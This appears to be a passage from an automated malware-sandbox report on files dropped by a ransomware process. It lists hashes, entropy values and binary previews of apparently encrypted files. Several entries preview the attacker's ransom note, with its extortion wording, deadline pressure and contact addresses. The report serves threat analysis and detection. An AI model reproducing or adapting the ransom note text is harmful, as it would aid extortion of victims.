                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):98570
                                                                                                    Entropy (8bit):0.6732672741519382
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:mFJJqlre/l/45K1fj0eygOBVcTMMdEERi3Rv3GyHElbDwx/vvZj:mFJJP0evQUMM2ui3vEyx/vF
                                                                                                    MD5:0A655DAE46A4DC12B9E656EE875CC615
                                                                                                    SHA1:5FC040A8348E5E83B9AFE54D031BE3AD90CDF540
                                                                                                    SHA-256:0A9EDD83C7CDFA1AD9FBC93DE4C2A537DE30A25A240BFDAACDE87926D2DC3E4D
                                                                                                    SHA-512:A7C9035C4AA19B001A5EEA8C8381B29146A6EF3DFC8835B56FBBA379AB37FBEDBE4B9D47587472DDE055024DAC0D6DC74A1FACCCF27426152443B316E369C2F4
                                                                                                    Malicious:false
                                                                                                    Preview:Iv..{.]....#.....D/........G....%%t.u.R......S......4.6..~e`8. dzm ..#.....%../M....[R/...n.Q+..r...9Z.........`...........-......t.@..........j...3.Bi.....n..%.'^...:.....[.U(...~....C...\(X.R.D......8..pAc....OD;..T..r...r.<.N.k..=......p.....1y..Z..cZ.C<Hl...Q.b..$x.<..+L.....y.=..f3U....d..n.$G.n; s..H\...P.a\.=.y.......N.[...:...uM.}$._A-w..\.D..e.s[.&a....r.....U...j..P..V..-.l,yN,.]..z...g....{....._Kt:..P.Of..5L.x..*.$Y<n..&?^..cH.....>.g.TV.A.,a....Z..G....p.....hD........q:7,.p.4...c.....QF.?.O..IX...E..._.%.f~...g9.t.N\.|.Ke...Pw....+......Y.Z..9...t......<XY.......z...../.p..Q,.w^....]F<..,.b)B."r.yZ...L..h.C...e.7.........M...%.WC.FWs.&...1}....[G..%..S.....-{..'..6C.,..?@...h".,M..gK.._...V+....!|..65.\...,..{..{.......I..`s... ......X(B..?....O..n!....g..R...7.%.L....rQT.....$./..rT/.b......K.Z..@......y....w...];y...{..mB0..USe.....X.Y@.i.......U.T>.....%jB1tT.N...Z..eW,.Y.....e..;....+A..<C..._.U..X...~..x.....S?~.)E
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:true
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3800
                                                                                                    Entropy (8bit):7.9420462936173255
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:dbVZFVIzKW7W8N3b9VtR8ZWgU6ox9hDEQ:dbVZQzKW7W8XVtREWgUjwQ
                                                                                                    MD5:E012F5D47FE696F8089FEA5BEE9D005C
                                                                                                    SHA1:66EF96A9A1A45F7A79F2933EA1F21235417232BC
                                                                                                    SHA-256:850F39EFE82148C99BF4073C919B3D3EC7AA9A99ABF0D518F8F3B79372335F9C
                                                                                                    SHA-512:1B0F56D2A9640583A3DFA11C9D3A96DBAA09880D6CF35610F2822A95303938ECB778959D9E68FFD19B72E09AABE3EB559EB8897D7480B384ACF064EE3E34DEF2
                                                                                                    Malicious:true
                                                                                                    Preview:.|rV..T.RZT ....n..eq...V...X.....(aH~...hX..*...S.MBF.XMj....i.8y..2.=.......E.Jz2...Y'.Oz.U*R...Gv.Y;C-5o.....:...l.Y)N.e.B.<.ubi.h.,.......It.....>n..'X........\.-$XHc3.`.u...|.,..(B.=..,..B...w.M..7.I...lF..G./.gR.?..d<U.-...v.6G(.~SY.L.4v_.9..#u(f....bT.^]Q>ta...r5......a"..is-Yb.~..C......ga&x....E...>........ SyN?..._i..d.O:..2...7.......?9F.u..3+.4...Xn.[..,%.6.W4.2.....$'<t..+..;....]...G.V..2.U.....Tv..g.......V.;...o...T......8......].8..X...?.\..1.1..................mh........A...`..y.,".Ss.^;NU.............D...1 ...k......2_%.>.T@.Oi>.YAU*...B.._..3@.T.).p`...8k.[h..:..4.x...0.._.n.....+...........'.i....j?...8.n...u...$...W(Uh8. r..X..9T....-(....K...Mw...b....-.D..l...[.7.1....~...7...........ET.A.1.`.A..U,<Aq.....OJ.I........".<...U....*.i.6......j.U....>7N.S...g......2m......LXV..oq....U...3Z... 1.,..........-....\eB...fn.z..x..R.....k_E..nRm..>"(.:.....L...1...',.... T.....Jkf..AG.....P..wz.].T..E..Z.......X'+....|.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3800
                                                                                                    Entropy (8bit):7.9420462936173255
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:dbVZFVIzKW7W8N3b9VtR8ZWgU6ox9hDEQ:dbVZQzKW7W8XVtREWgUjwQ
                                                                                                    MD5:E012F5D47FE696F8089FEA5BEE9D005C
                                                                                                    SHA1:66EF96A9A1A45F7A79F2933EA1F21235417232BC
                                                                                                    SHA-256:850F39EFE82148C99BF4073C919B3D3EC7AA9A99ABF0D518F8F3B79372335F9C
                                                                                                    SHA-512:1B0F56D2A9640583A3DFA11C9D3A96DBAA09880D6CF35610F2822A95303938ECB778959D9E68FFD19B72E09AABE3EB559EB8897D7480B384ACF064EE3E34DEF2
                                                                                                    Malicious:false
                                                                                                    Preview:.|rV..T.RZT ....n..eq...V...X.....(aH~...hX..*...S.MBF.XMj....i.8y..2.=.......E.Jz2...Y'.Oz.U*R...Gv.Y;C-5o.....:...l.Y)N.e.B.<.ubi.h.,.......It.....>n..'X........\.-$XHc3.`.u...|.,..(B.=..,..B...w.M..7.I...lF..G./.gR.?..d<U.-...v.6G(.~SY.L.4v_.9..#u(f....bT.^]Q>ta...r5......a"..is-Yb.~..C......ga&x....E...>........ SyN?..._i..d.O:..2...7.......?9F.u..3+.4...Xn.[..,%.6.W4.2.....$'<t..+..;....]...G.V..2.U.....Tv..g.......V.;...o...T......8......].8..X...?.\..1.1..................mh........A...`..y.,".Ss.^;NU.............D...1 ...k......2_%.>.T@.Oi>.YAU*...B.._..3@.T.).p`...8k.[h..:..4.x...0.._.n.....+...........'.i....j?...8.n...u...$...W(Uh8. r..X..9T....-(....K...Mw...b....-.D..l...[.7.1....~...7...........ET.A.1.`.A..U,<Aq.....OJ.I........".<...U....*.i.6......j.U....>7N.S...g......2m......LXV..oq....U...3Z... 1.,..........-....\eB...fn.z..x..R.....k_E..nRm..>"(.:.....L...1...',.... T.....Jkf..AG.....P..wz.].T..E..Z.......X'+....|.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3877
                                                                                                    Entropy (8bit):7.957917137159112
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:YHYBNBdYq3gFT8RtBJ3bhOZ9199YcMp0D87TDDOH:YHYDYq3goBJYZDYcur7TDyH
                                                                                                    MD5:A0BCCAFF78E9FCE0BF4E46BB599E55B3
                                                                                                    SHA1:A92232AD6E9BFA157349BA6B3616E35FA3E6F2C1
                                                                                                    SHA-256:A25B950E26757633CBD67BB35E5876A00C3248A0D8F6667130CD8D6EF950BD88
                                                                                                    SHA-512:B3234AC8BC5C43757256B45E22E15B332878AB5F75F3CE47A2B79F9C209D7DE4C375DB107F0694CB600EB3CEB018AB0331005B00A4E68687537C46D9AC6B9B1D
                                                                                                    Malicious:true
                                                                                                    Preview:.J.F....<R5..dxx..(.DK..EuC+..(.B.......>/..o.J.uG\..../6Z..SP..(...]9..~.z!y'....D......H,..^..Z..Y.3s.......#.^k...Lk3...E.;F....._a1.-.M..uy.z.Z.U.....'a...]tJ.e..;.ACr..n.=m.b../\..j.S.aN*F.4Fo._..k.7..M%L.....i..q.XL&..J^..|......^T....G<.....J...Yx?.J|.kE.4e.s+/......@X..E...Li8~3....*..=...l..R......|.{.J.7....0I8...+f..t`.V.6m.J..#. ..K...u m.b...........5....MC.9.{.B-x.x.@j.......0{.v.qrl.......Y...cG.D.o.`.9..I..C...?+...JDG..0p.f>.......4..f..F0.. .....`.6.-...U.A..{.r.{.P....]....&nM.9pI.......|..`....Myv/.-..P.dN....#....D:....?..........!.G.Rh.Z\....~$..D...'x.......P..E.<-.|=.@y.JV.....F.V..H...O.ll...,..o....7C.4v-..X....'=.!6....w....N.....+..g.t!..cg>...\'...I.>..j....S/.............:@op..S.I.[O.D..?>`. ...e....]q..+.Ho..C,.ayb"..0.^..-&.......3L..O....7D...{....D....s.=.x^.$.W..qx..b.a...iF.!.............$...E........F....d.q.1$5...0..@...=..B.3.+..N...N.#....@j$=r[9..1F..a............%.4.o...S.A.8..&.. .s.0.K.i...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3877
                                                                                                    Entropy (8bit):7.957917137159112
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:YHYBNBdYq3gFT8RtBJ3bhOZ9199YcMp0D87TDDOH:YHYDYq3goBJYZDYcur7TDyH
                                                                                                    MD5:A0BCCAFF78E9FCE0BF4E46BB599E55B3
                                                                                                    SHA1:A92232AD6E9BFA157349BA6B3616E35FA3E6F2C1
                                                                                                    SHA-256:A25B950E26757633CBD67BB35E5876A00C3248A0D8F6667130CD8D6EF950BD88
                                                                                                    SHA-512:B3234AC8BC5C43757256B45E22E15B332878AB5F75F3CE47A2B79F9C209D7DE4C375DB107F0694CB600EB3CEB018AB0331005B00A4E68687537C46D9AC6B9B1D
                                                                                                    Malicious:false
                                                                                                    Preview:.J.F....<R5..dxx..(.DK..EuC+..(.B.......>/..o.J.uG\..../6Z..SP..(...]9..~.z!y'....D......H,..^..Z..Y.3s.......#.^k...Lk3...E.;F....._a1.-.M..uy.z.Z.U.....'a...]tJ.e..;.ACr..n.=m.b../\..j.S.aN*F.4Fo._..k.7..M%L.....i..q.XL&..J^..|......^T....G<.....J...Yx?.J|.kE.4e.s+/......@X..E...Li8~3....*..=...l..R......|.{.J.7....0I8...+f..t`.V.6m.J..#. ..K...u m.b...........5....MC.9.{.B-x.x.@j.......0{.v.qrl.......Y...cG.D.o.`.9..I..C...?+...JDG..0p.f>.......4..f..F0.. .....`.6.-...U.A..{.r.{.P....]....&nM.9pI.......|..`....Myv/.-..P.dN....#....D:....?..........!.G.Rh.Z\....~$..D...'x.......P..E.<-.|=.@y.JV.....F.V..H...O.ll...,..o....7C.4v-..X....'=.!6....w....N.....+..g.t!..cg>...\'...I.>..j....S/.............:@op..S.I.[O.D..?>`. ...e....]q..+.Ho..C,.ayb"..0.^..-&.......3L..O....7D...{....D....s.=.x^.$.W..qx..b.a...iF.!.............$...E........F....d.q.1$5...0..@...=..B.3.+..N...N.#....@j$=r[9..1F..a............%.4.o...S.A.8..&.. .s.0.K.i...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13684
                                                                                                    Entropy (8bit):7.444152338892662
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:zzGCfafQNpYtJHgFPnWxyi5L9ti4derukuNeYrjL8X8:5aGUJHgFeAi5xti4do3mV3L8X8
                                                                                                    MD5:DAEB05A32F888840BB1EDFAA3757DBFF
                                                                                                    SHA1:C5BCDC3667930A47EAD0D435B6B0F88B08D5CCA0
                                                                                                    SHA-256:B74AC0E390737C26C1A64EE66B6D9684C4CA3640FFF58A546B57289F45C17743
                                                                                                    SHA-512:025CCEDD6D408EF75272281C934C8A21F47D3405D45043346CF079ADB973D52CDD61734EF114EBD05D33D0D9EFCE0F38AD8780918ED1CF9E3F710041B20CA814
                                                                                                    Malicious:true
                                                                                                    Preview:....z.P8..m.&..0W.........&4Q.v.v....*f.56U.P..@...f.F/...`=.&.l..|.._R1O.R5kb.M.a.;.......WT..c8..}V.4.....E......v."J...G>..y..K....7.8.....Z.Y`.~o3$..t.@_.r)...... .).... i..q..0.U<..B..VE.......J.....W.J...r.r.o..|...X.nZ.c..bO...Z....q....ZN..{..- .N.X....WD.....b.Z....#.w;..0.q./.K\ .@........z;3.m..v.GcC..rqK..J.....wc.'..q-.....V..)..{.hA.49).......4..0....~j.4.......$.Z}=..Bvy{A..u^tK.>................z........PZF..../Nc.E}..0U~.\........20-.)y.#.......).m..H"......2..(...{..]..$n..l....._z..C..S.t.,...1.....iU|>..xC;..\m;|.=..@..cR...`.......*(.Km.]...9...S.V....}z....k.........csK.p....Z.:..u2'.'u..K3y,...b..A..cd.........#q&!..y....-i..........ZW=K.... .E.w...#..@....@....+].{......7J...C...`..`...E/B.y.h.e..^....".i.. .}^...y...........Hq.~...jgz...+..he....(..ZY..\6E..l.Mw.........5....e/.&..k..F.H7.&JO.......U.....P(.A.95.U....!~.).*j..7ea.....8;...l..:.5;.`...|.(!...'..+..x..\.O..({.G..C........;&..tZb.{>8D..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13684
                                                                                                    Entropy (8bit):7.444152338892662
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:zzGCfafQNpYtJHgFPnWxyi5L9ti4derukuNeYrjL8X8:5aGUJHgFeAi5xti4do3mV3L8X8
                                                                                                    MD5:DAEB05A32F888840BB1EDFAA3757DBFF
                                                                                                    SHA1:C5BCDC3667930A47EAD0D435B6B0F88B08D5CCA0
                                                                                                    SHA-256:B74AC0E390737C26C1A64EE66B6D9684C4CA3640FFF58A546B57289F45C17743
                                                                                                    SHA-512:025CCEDD6D408EF75272281C934C8A21F47D3405D45043346CF079ADB973D52CDD61734EF114EBD05D33D0D9EFCE0F38AD8780918ED1CF9E3F710041B20CA814
                                                                                                    Malicious:false
                                                                                                    Preview:....z.P8..m.&..0W.........&4Q.v.v....*f.56U.P..@...f.F/...`=.&.l..|.._R1O.R5kb.M.a.;.......WT..c8..}V.4.....E......v."J...G>..y..K....7.8.....Z.Y`.~o3$..t.@_.r)...... .).... i..q..0.U<..B..VE.......J.....W.J...r.r.o..|...X.nZ.c..bO...Z....q....ZN..{..- .N.X....WD.....b.Z....#.w;..0.q./.K\ .@........z;3.m..v.GcC..rqK..J.....wc.'..q-.....V..)..{.hA.49).......4..0....~j.4.......$.Z}=..Bvy{A..u^tK.>................z........PZF..../Nc.E}..0U~.\........20-.)y.#.......).m..H"......2..(...{..]..$n..l....._z..C..S.t.,...1.....iU|>..xC;..\m;|.=..@..cR...`.......*(.Km.]...9...S.V....}z....k.........csK.p....Z.:..u2'.'u..K3y,...b..A..cd.........#q&!..y....-i..........ZW=K.... .E.w...#..@....@....+].{......7J...C...`..`...E/B.y.h.e..^....".i.. .}^...y...........Hq.~...jgz...+..he....(..ZY..\6E..l.Mw.........5....e/.&..k..F.H7.&JO.......U.....P(.A.95.U....!~.).*j..7ea.....8;...l..:.5;.`...|.(!...'..+..x..\.O..({.G..C........;&..tZb.{>8D..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13687
                                                                                                    Entropy (8bit):7.437850388020902
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:fMy92KcYaYpYtJHgFPnWxyi5sji4derFkuN9YrRLj:0c3HUJHgFeAi5sji4doCmadLj
                                                                                                    MD5:2225FECA53D8F854C5EE82F9A31BFBBF
                                                                                                    SHA1:BE80AF9E4AC17A0827E5CF1C1CBFCFB9CFF6A1DD
                                                                                                    SHA-256:A858B7B46B782479E9EEAB0C63A4B9D2DE72FB613AA506B10422407DE878FB7C
                                                                                                    SHA-512:7FFC10214F5B06856EFA5E412C805849098C0C2690F999A5EDA0D5D5E0AD71B2EEA56EE44FEFF2550B6250874EDADF958D7BA0D229E6FEEE21DE45C468589B99
                                                                                                    Malicious:true
                                                                                                    Preview:..)-...:tL.d...i........6R.].h;.j.W7.8....).{......Q.a_..d...O....)+P.x`..m....k.X...3:..k.OrQ....H.cU..0$A!2...+.a?....."...9_...i.a.oiwBV....f.!^...r>...4.z.....1.%.e\.kJ-...[........8M.....(.?;w.50.8..1.R.'.....7aw......>D.b4j...2.W|...5.\.3A..QW. K8(.u..Y.N....'....!..n.3..E.......^....U.m$.u!.X'....A...{.;.Z=..^.g:y........f.....[.T..x...H.Q.(\.9.w..q.|.@......ko.....H.1bN..c..9...y.W.Q-.y|..h...=..?I.9.V.h..<1...}Z.......bO..n>.....4...........2...+.5C9.\VOX.qS.C.o\..B.D.OZ].E\..]..AZ.c.r..+3.]$....G!.8.I.+7Y.`XY..A.@?..4m.w...m&Vn.R.....?.<H.$.../V....l2.@...$n.M..I..Fo..........~q.......0C........l7r...W....rp.. .:.s.Y..;....;..b).W..p..#..f.~Y..s9..X...-.}...H.MOc,?:.E+.*6.....(._H...Br.Oa.AEd..i.0.....0.......z..3@A(_l..KF/:."_0J.`..H.:xr...K..X......;....XS!c"..)..{....s;...C15..f...<..x..*..t[......d.8.X.!(pz7_..Q.=.@*.|x..B..0......U.}..W...].s5pj.z6...W'&0......&..Nm...JvV.%.....*..h.4.+`...K..$.p...L.5..D.M=4.)Hu..e..64..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13687
                                                                                                    Entropy (8bit):7.437850388020902
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:fMy92KcYaYpYtJHgFPnWxyi5sji4derFkuN9YrRLj:0c3HUJHgFeAi5sji4doCmadLj
                                                                                                    MD5:2225FECA53D8F854C5EE82F9A31BFBBF
                                                                                                    SHA1:BE80AF9E4AC17A0827E5CF1C1CBFCFB9CFF6A1DD
                                                                                                    SHA-256:A858B7B46B782479E9EEAB0C63A4B9D2DE72FB613AA506B10422407DE878FB7C
                                                                                                    SHA-512:7FFC10214F5B06856EFA5E412C805849098C0C2690F999A5EDA0D5D5E0AD71B2EEA56EE44FEFF2550B6250874EDADF958D7BA0D229E6FEEE21DE45C468589B99
                                                                                                    Malicious:false
                                                                                                    Preview:..)-...:tL.d...i........6R.].h;.j.W7.8....).{......Q.a_..d...O....)+P.x`..m....k.X...3:..k.OrQ....H.cU..0$A!2...+.a?....."...9_...i.a.oiwBV....f.!^...r>...4.z.....1.%.e\.kJ-...[........8M.....(.?;w.50.8..1.R.'.....7aw......>D.b4j...2.W|...5.\.3A..QW. K8(.u..Y.N....'....!..n.3..E.......^....U.m$.u!.X'....A...{.;.Z=..^.g:y........f.....[.T..x...H.Q.(\.9.w..q.|.@......ko.....H.1bN..c..9...y.W.Q-.y|..h...=..?I.9.V.h..<1...}Z.......bO..n>.....4...........2...+.5C9.\VOX.qS.C.o\..B.D.OZ].E\..]..AZ.c.r..+3.]$....G!.8.I.+7Y.`XY..A.@?..4m.w...m&Vn.R.....?.<H.$.../V....l2.@...$n.M..I..Fo..........~q.......0C........l7r...W....rp.. .:.s.Y..;....;..b).W..p..#..f.~Y..s9..X...-.}...H.MOc,?:.E+.*6.....(._H...Br.Oa.AEd..i.0.....0.......z..3@A(_l..KF/:."_0J.`..H.:xr...K..X......;....XS!c"..)..{....s;...C15..f...<..x..*..t[......d.8.X.!(pz7_..Q.=.@*.|x..B..0......U.}..W...].s5pj.z6...W'&0......&..Nm...JvV.%.....*..h.4.+`...K..$.p...L.5..D.M=4.)Hu..e..64..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):710
                                                                                                    Entropy (8bit):7.718646428097265
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:Xlz80FtQrAe0akzbYYM7e8NzY2ANBzG/m6OUJ2e8+Vbn+UL/kEmByEYbcw2n:1z1FtQBeMnqNBzGO6OUJombn+pBYb2
                                                                                                    MD5:3DD8DE76C81F93E97E9630FD2FCD6B1C
                                                                                                    SHA1:5F390AAB3ACCE851303A974FEF3A70D3BE9066CF
                                                                                                    SHA-256:33736D96BAEFB505753FC937813170E3022ECDA935BFD72C98CD58F306632BBA
                                                                                                    SHA-512:CCE2013B57E125FA3E7C9FB02E80CACA31F901C44B08BD942EE55917E5AD3CAD0EF06DEC8622DD673EA5FFD401A7D768308F2BD4A2169DA6F7CC97E0CB5EF069
                                                                                                    Malicious:true
                                                                                                    Preview:1r.i&..~>.....T.]U..y..Z@i....i...@......NJ.v...@W....h...,%..M.qx;.Z9.....!....X.#.D..&A....*v....{i.....8Y..,.R...y..q..u&.LLM..p.bo/ek.?1.L+w.f...a.s..\..'.7.J6.P<.. +.L......U..S.(\.f..=~.C..h...$......=..q.n...<z..@.].......%-..''h&*9...H....]Iz+.m....e....1{..eX..Q*J..]M|,..&a...3..3.u....3....QxYPS.4.b#C.....4.....DZww......z.L$,)ZJ.u...gx[.Zw..2.........:"..o....i.....D.h.._..;..S.G.,c.e.Ja.H..$.5.TAL.8181902c4b"}(..G...?.,.9.d.b.h./..`.C.HbL$}.....8.d..|`i.&...:....A<..."....vC<..{K.b....k.*. ..Q........../.4.<%]...u...D...%........)KU}S)..mo.=.......(M.8.x)m.r..-..[.~..TZ.^K.r.O.e.....v.....S.I=.]..xzG..D. !p..1..".r:O.........z..N.\D.W.]..Z..b..}yK...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):710
                                                                                                    Entropy (8bit):7.718646428097265
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:Xlz80FtQrAe0akzbYYM7e8NzY2ANBzG/m6OUJ2e8+Vbn+UL/kEmByEYbcw2n:1z1FtQBeMnqNBzGO6OUJombn+pBYb2
                                                                                                    MD5:3DD8DE76C81F93E97E9630FD2FCD6B1C
                                                                                                    SHA1:5F390AAB3ACCE851303A974FEF3A70D3BE9066CF
                                                                                                    SHA-256:33736D96BAEFB505753FC937813170E3022ECDA935BFD72C98CD58F306632BBA
                                                                                                    SHA-512:CCE2013B57E125FA3E7C9FB02E80CACA31F901C44B08BD942EE55917E5AD3CAD0EF06DEC8622DD673EA5FFD401A7D768308F2BD4A2169DA6F7CC97E0CB5EF069
                                                                                                    Malicious:false
                                                                                                    Preview:1r.i&..~>.....T.]U..y..Z@i....i...@......NJ.v...@W....h...,%..M.qx;.Z9.....!....X.#.D..&A....*v....{i.....8Y..,.R...y..q..u&.LLM..p.bo/ek.?1.L+w.f...a.s..\..'.7.J6.P<.. +.L......U..S.(\.f..=~.C..h...$......=..q.n...<z..@.].......%-..''h&*9...H....]Iz+.m....e....1{..eX..Q*J..]M|,..&a...3..3.u....3....QxYPS.4.b#C.....4.....DZww......z.L$,)ZJ.u...gx[.Zw..2.........:"..o....i.....D.h.._..;..S.G.,c.e.Ja.H..$.5.TAL.8181902c4b"}(..G...?.,.9.d.b.h./..`.C.HbL$}.....8.d..|`i.&...:....A<..."....vC<..{K.b....k.*. ..Q........../.4.<%]...u...D...%........)KU}S)..mo.=.......(M.8.x)m.r..-..[.~..TZ.^K.r.O.e.....v.....S.I=.]..xzG..D. !p..1..".r:O.........z..N.\D.W.]..Z..b..}yK...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4719
                                                                                                    Entropy (8bit):7.9451135244677085
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:SN1gLndS6LZ82iYTKg0jjXLUW7v9JqYpCc2fLdaki7vtkXgq9SGOrZ:21gLn1Z82iYuN7vOO2jAZCwY8
                                                                                                    MD5:33C95B3AAB2ED2F028AB61D235774C35
                                                                                                    SHA1:D608A2391EFCE818BF1D0AFDA004999334CA1559
                                                                                                    SHA-256:F40CC560000DD736E3CD02753C76E4DAFDF320D6B605EDC8CB75D168BC7FBE61
                                                                                                    SHA-512:91ED4798539779E3E5155815C05F0F0A87D6BE9A3A85E3217196644A54C5086DEDE6BE2CF4E42234DBB3C727F01C2159FE55466D4D32FD5B19701A06720872C2
                                                                                                    Malicious:true
